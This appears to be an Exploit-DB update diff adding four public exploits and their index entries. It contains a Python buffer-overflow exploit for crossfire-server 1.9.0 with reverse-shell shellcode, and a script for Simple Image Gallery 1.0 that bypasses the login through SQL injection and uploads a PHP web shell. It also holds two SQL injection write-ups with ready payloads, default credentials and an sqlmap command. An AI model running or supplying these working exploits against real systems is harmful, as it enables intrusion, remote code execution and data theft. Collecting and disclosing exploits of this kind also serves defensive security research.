DB: 2021-08-19

4 changes to exploits/shellcodes

crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections

exploits/linux/remote/50216.py

@@ -0,0 +1,52 @@
+# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
+# Exploit Author: Khaled Salem @Khaled0x07
+# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
+# Version: 1.9.0
+# Tested on: Kali Linux 2020.4
+# CVE : CVE-2006-1236
+
+#!/bin/python
+import socket
+import time
+
+
+# Crash at 4379
+# EIP Offset at 4368
+# Badchar \x00\x20
+# ECX Size 170
+# CALL ECX 0x080640eb
+
+size = 4379
+
+# Attacker IP: 127.0.0.1 Port: 443
+shellcode =  b""
+shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
+shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
+shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
+shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56"
+shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77"
+shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64"
+shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31"
+shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a"
+shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d"
+
+
+
+
+try:
+	filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode))
+	EIP = "\xeb\x40\x06\x08" 
+	padding = "C" * (4379 - len(filler) - len(EIP))
+	payload = filler + EIP + padding
+	inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#"
+	print("Sending Buffer with size:" + str(len(payload)))
+	s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
+	s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
+	print(s.recv(1024))
+
+	s.send(inputBuffer)
+	s.close()
+
+except:
+	print("Could not connect")
+	exit(0)

exploits/php/webapps/50213.txt

@@ -0,0 +1,73 @@
+# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
+# Date: 17/08/2021
+# Exploit Author: Davide 't0rt3ll1n0' Taraschi 
+# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
+# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## Impact:
+ An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server. 
+
+## Description: 
+ All four parameters passed via POST are vulnerable:
+ `fname` is vulnerable both to boolean-based blind and time-based blind SQLi
+ `oname` is vulnerable both to boolean-based blind and time-based blind SQLi
+ `username` is only vulnerable to time-based blind SQLi
+ `status` is vulnerable both to boolean-based blind and time-based blind SQLi 
+
+## Remediation:
+Here is the vulnerable code:
+
+if($status==''){
+    mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
+}
+if(!empty($status)){
+    mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
+}
+
+As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
+To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.
+
+## Exploitation through sqlmap
+1) Log into the application (you can try the default creds 1111:admin123)
+2) Copy your PHPSESSID cookie
+3) Launch the following command:
+sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
+replacing $target with your actual target and $phpsessid with the cookie that you had copied before
+
+## PoC:
+Request:
+POST /ghpolice/admin/savestaffedit.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/ghpolice/admin/user.php
+Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
+
+And after 5 seconds we got:
+
+HTTP/1.1 200 OK
+Date: Tue, 17 Aug 2021 14:28:59 GMT
+Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/7.4.22
+Content-Length: 1074
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+ <!DOCTYPE html>
+ etc...

exploits/php/webapps/50214.py

@@ -0,0 +1,73 @@
+# Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 17.08.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
+# Version: V 1.0
+# Tested on: Ubuntu
+
+import requests
+import random
+import string
+import json
+from bs4 import BeautifulSoup
+
+url = input("TARGET = ")
+
+if not url.startswith('http://') and not url.startswith('https://'):
+    url = "http://" + url
+if not url.endswith('/'):
+    url = url + "/"
+
+payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
+
+session = requests.session()
+
+print("Login Bypass")
+
+request_url = url + "/classes/Login.php?f=login"
+post_data = {"username": "admin' or '1'='1'#", "password": ""}
+bypassUser = session.post(request_url, data=post_data)
+data = json.loads(bypassUser.text)
+status = data["status"]
+
+if status == "success":
+
+    let = string.ascii_lowercase
+
+    shellname = ''.join(random.choice(let) for i in range(15))
+    shellname = 'Tago'+shellname+'Letta'
+
+    print("shell name "+shellname)
+
+    print("\nprotecting user")
+    request_url = url + "?page=user"
+    getHTML = session.get(request_url)
+    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
+
+    ids = getHTMLParser.find('input', {'name':'id'}).get("value")
+    firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value")
+    lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value")
+    username = getHTMLParser.find('input', {'id':'username'}).get("value")
+
+    print("\nUser ID : " + ids)
+    print("Firsname : " + firstname)
+    print("Lasname : " + lastname)
+    print("Username : " + username + "\n")
+
+    print("shell uploading")
+
+    request_url = url + "/classes/Users.php?f=save"
+    request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
+    request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
+    upload = session.post(request_url, headers=request_headers, data=request_data)
+
+    if upload.text == "1":
+        print("- OK -")
+        req = session.get(url + "/?page=user")
+        parser = BeautifulSoup(req.text, 'html.parser')
+        find_shell = parser.find('img', {'id':'cimg'})
+        print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
+    else:
+        print("- NO :( -")
+else:
+    print("No bypass user")

exploits/php/webapps/50215.txt

@@ -0,0 +1,203 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
+# Date: 17-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: V1
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /check_availability.php HTTP/1.1
+Host: localhost
+Content-Length: 12
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/add-phlebotomist.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+employeeid=1
+
+# Vulnerable Payload:
+
+# Parameter: employeeid (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload:
+
+employeeid=1' AND 2323=2323 AND 'gARj'='gARj
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /add-phlebotomist.php HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/add-phlebotomist.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit
+
+# Vulnerable Payload:
+
+# Parameter: empid (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /edit-phlebotomist.php?pid=6 HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/edit-phlebotomist.php?pid=6
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update
+
+# Vulnerable Payload:
+
+# Parameter: fullname (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /bwdates-report-result.php HTTP/1.1
+Host: localhost
+Content-Length: 51
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/bwdates-report-ds.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+fromdate=2021-08-17&todate=2021-08-17&submit=Submit
+
+# Vulnerable Payload:
+
+# Parameter: fromdate (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /search-report-result.php HTTP/1.1
+Host: localhost
+Content-Length: 27
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/search-report.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+serachdata=32&search=Search
+
+# Vulnerable Payload:
+
+# Parameter: serachdata (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 7 columns
+# Payload:
+
+serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search

files_exploits.csv

@@ -18522,6 +18522,7 @@ id,file,description,date,author,type,platform,port
 50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware,
 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",2021-07-28,"Ivan Nikolsky",remote,hardware,
 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",2021-08-02,"Christopher Ellis",remote,java,
+50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2021-08-18,"Khaled Salem",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44339,3 +44340,6 @@ id,file,description,date,author,type,platform,port
 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware,
 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
 50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware,
+50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,
+50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php,
+50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,